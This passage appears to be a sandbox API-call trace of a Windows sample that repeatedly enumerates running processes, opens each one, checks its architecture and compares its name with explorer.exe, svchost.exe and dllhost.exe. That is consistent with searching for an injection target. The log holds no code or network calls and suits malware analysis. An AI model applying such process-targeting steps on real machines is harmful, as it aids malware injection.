lpString2="explorer.exe") returned -1 [0214.941] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0214.941] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0214.941] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0214.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0214.941] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.941] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.942] CloseHandle (hObject=0xec) returned 1 [0214.942] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0214.942] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0214.942] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0214.942] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0214.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0214.942] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.942] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.942] CloseHandle (hObject=0xec) returned 1 [0214.942] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0214.942] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0214.942] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0214.942] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0214.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0214.943] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.943] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.943] CloseHandle (hObject=0xec) returned 1 [0214.943] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0214.943] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0214.943] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0214.943] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0214.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0214.944] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.944] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0214.944] CloseHandle (hObject=0xec) returned 1 [0214.944] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0214.944] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0214.944] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0214.944] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0214.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0214.944] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0214.945] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0214.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0214.945] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0214.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0214.946] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0214.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0214.946] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0215.065] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.065] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.065] CloseHandle (hObject=0xec) returned 1 [0215.065] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0215.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0215.066] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.066] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.066] CloseHandle (hObject=0xec) returned 1 [0215.066] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0215.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0215.067] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0215.067] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.067] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.067] CloseHandle (hObject=0xec) returned 1 [0215.067] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0215.067] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0215.068] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.068] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.068] CloseHandle (hObject=0xec) returned 1 [0215.068] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.069] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0215.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0215.069] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.069] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.069] CloseHandle (hObject=0xec) returned 1 [0215.069] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0215.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0215.070] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.070] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0215.070] CloseHandle (hObject=0xec) returned 1 [0215.070] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0215.070] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0215.070] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0215.070] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x6c0064, th32ProcessID=0x68006c, th32DefaultHeapID=0x73006f, th32ModuleID=0x2e0074, cntThreads=0x780065, th32ParentProcessID=0x65, pcPriClassBase=0, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0215.070] CloseHandle (hObject=0xe8) returned 1 [0215.071] Sleep (dwMilliseconds=0x3e8) [0216.153] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0216.156] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0216.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0216.157] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0216.157] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0216.157] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0216.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0216.158] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0216.158] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0216.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0216.159] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0216.159] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0216.159] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0216.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0216.160] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0216.160] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0216.160] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0216.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0216.161] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0216.161] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0216.161] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0216.162] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.162] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0216.162] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0216.163] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.163] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0216.163] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0216.164] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0216.164] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0216.164] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0216.165] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.165] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0216.165] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0216.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0216.166] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.166] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.166] CloseHandle (hObject=0xec) returned 1 [0216.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0216.166] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0216.166] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0216.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0216.167] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.167] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.167] CloseHandle (hObject=0xec) returned 1 [0216.167] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0216.167] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0216.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0216.168] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0216.168] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0216.168] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.169] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.169] CloseHandle (hObject=0xec) returned 1 [0216.169] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0216.169] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0216.169] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0216.169] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0216.169] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0216.169] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.169] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.169] CloseHandle (hObject=0xec) returned 1 [0216.169] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0216.169] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0216.169] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0216.169] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0216.170] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0216.170] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.170] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.170] CloseHandle (hObject=0xec) returned 1 [0216.170] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0216.170] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0216.170] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0216.170] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0216.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0216.171] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.171] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.171] CloseHandle (hObject=0xec) returned 1 [0216.171] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0216.171] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0216.171] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0216.171] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0216.171] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0216.171] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.171] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0216.171] CloseHandle (hObject=0xec) returned 1 [0216.171] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0216.171] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0216.171] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0216.171] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 